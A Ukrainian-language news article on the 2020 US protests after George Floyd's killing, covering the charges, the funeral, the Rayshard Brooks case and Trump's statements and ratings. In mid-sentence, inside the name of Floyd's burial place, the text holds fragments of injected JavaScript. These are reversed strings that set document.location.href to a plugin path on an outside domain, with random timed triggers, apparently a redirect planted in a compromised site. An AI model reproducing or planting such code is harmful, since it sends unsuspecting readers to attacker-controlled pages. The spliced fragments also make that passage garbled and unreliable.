В миреПротести в США та рейтинг Трампа

Протести в США та рейтинг Трампа

-

Протести в США та рейтинг Трампа

Олександр Задорожній

Нинішня ситуація з протестами США мала свій початок 25 травня, коли оприлюднили новину про смерть Джорджа Флойда, темношкірого чоловіка з кримінальним минулим, якого вбив при спробі арешту поліцейський, притиснувши йому шию коліном, та не послаблюючи захват, не зважаючи на благання того й крики Джорджа про те, що він не може дихати. За наступну добу вулиці Міннеаполіса наповнилися протестувальниками, які вимагали правосуддя та більш детального розслідування у цій справі, а також загальної реформи поліції, ціллю якої була б боротьба з расизмом. Вже через кілька днів мирні протести переросли в агресивні, почалися акти вандалізму, мародерства та насильства. На вулицях почали з’являтися люди, які не мають нічого спільного з протестувальниками, й займаються виключно мародерством.
Трамп відреагував на це, висловивши співчуття родині загиблого, та віддавши наказ про пришвидшення розслідування вбивства, а протестувальників закликав утриматися від мародерства: «коли починається мародерство – починається стрілянина». На початку червня до протестувальників приєдналися люди зі скрутним фінансовим становищем, яке виникло внаслідок пандемії коронавірусу. Переповнені люттю та почуттям безвихідності, вони почали трощити та грабувати магазини, не розбираючи, людям з яким кольором шкіри вони належать.
Тим часом, вбивці Джорджа Флойда, Дереку Чавену, посилили обвинувачення. 3 червня, чоловіка звинуватили у вбивстві другого ступеня (за законами штату Міннесота йому загрожує до 40 років ув’язнення). Раніше йому пред’явили звинувачення у вбивстві третього ступеня і ненавмисному вбивстві другого ступеня. Журналісти відзначали, що офіційне звинувачення з’явилося лише через вісім днів після вбивства Джорджа. А наступного дня з’явилася інформація, що Флойд був заражений коронавірусом, про це повідомило видання The Sun, посилаючись на судмедекспертів, які проводили розтин. Лікарі також виявили в організмі загиблого наркотичні речовини. Імовірно, це були каннабіноїди, амфетамін і фентаніл.
Шостого червня з’явилася новина про те, що небайдужі американці зібрали майже 13 мільйонів доларів для родини Джорджа з благодійними цілями. Ці кошти мають витратити на поховальну церемонію та психологічну допомогу членам родини.
10 червня пройшла церемонія прощання з покійним. Після неї тіло Флойда «останню милю» провезли до кладовища на катафалку, який запрягли кіньми. Чоловіка поховають поруч з його мамою на кладовищі Houstoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton Memorial Gardens у місті Перленд.
Також протести розгорнулися не тільки в США. Багато людей вийшли на мітинги також у Франції, Німеччині та Англії. Весь об’єднався заради протесту проти расизму. Протестуючи використовують фразу «BlackLivesMatter», що у перекладі означає «Життя чорних важливі». На супротив їм також виступають активісти із фразою «AllLivesMatter» — «Всі життя важливі», часто між ними виникають сутички.
14 червня протести розгорнулися з новою силою через вбивство Рейшарда Брукса. Як повідомляє CNN, він заснув за кермом на переході, а коли копи намагалися вмовити його пройти тест на тверезість, почав чинити опір. Між копом та чоловіком зав’язалася сутичка, із якої чоловік вирвався з предметом, схожим на поліцейський шокер, та почав цілитися ним у копів. Вони відкрили вогонь у відповідь. Після цієї ситуації начальник міської поліції Еріка Шилдс подала у відставку. Поліцейський, який вистрілив у Брукса звільнений, другого причетного до інциденту поліцейського відправили в адміністративну відпустку. – УНІАН
З плином протестів по США і по усьому світу почала розповсюджуватися ідея, що у всьому расизмі винні колонізатори, які триста років тому заклали для цього підґрунтя. Протестувальники розфарбовують або зносять пам’ятники Христофору Колумбу та іншим колонізаторам, а також колишнім американським президентам, які підтримували рабство чи расизм. Схожі акції відбуваються у всьому світі.
Як повідомляє УНІАН 18 червня: У США на місці вбивства Джорджа Флойда влаштували мекку. Читайте також Брат Флойда закликав ООН провести у США розслідування через расизм поліції.Про це повідомляє Telegram-канал Perepichka News. “Туди приходять “паломники” купатися у “святій” купальні й читати проповіді, а навколишня територія тепер священна земля. Водні процедури називають расовим очищенням”, – йдеться у повідомленні.
А Трамп знову сколихнув суспільство новою заявою. Цього разу він назвав протестувальників «Божевільним натовпом ліваків». Далі цитата: «Вони намагаються знести наші статуї й покарати, переслідувати будь-кого, хто не згоден з їх вимогою абсолютної влади. Ми не згодні, тому ми тут. Ця жорстока кампанія цензури й виключення порушує все, що ми цінуємо як американці. Вони хочуть знести нашу спадщину, щоб ввести свій новий агресивний режим. Вони хочуть позбавити фінансування й розпустити наші поліцейські департаменти» .
Наразі протести продовжуються у колишньому темпі, з частими випадками мародерства, що негативно позначається на економіці США, а різкі висловлювання Трампа на його політичному рейтингу. Останнє є важливою деталлю, адже цього року в США пройдуть вибори на пост президента.

Коментарі

Варте уваги ПОВ'ЯЗАНІ
Рекомендовано Вам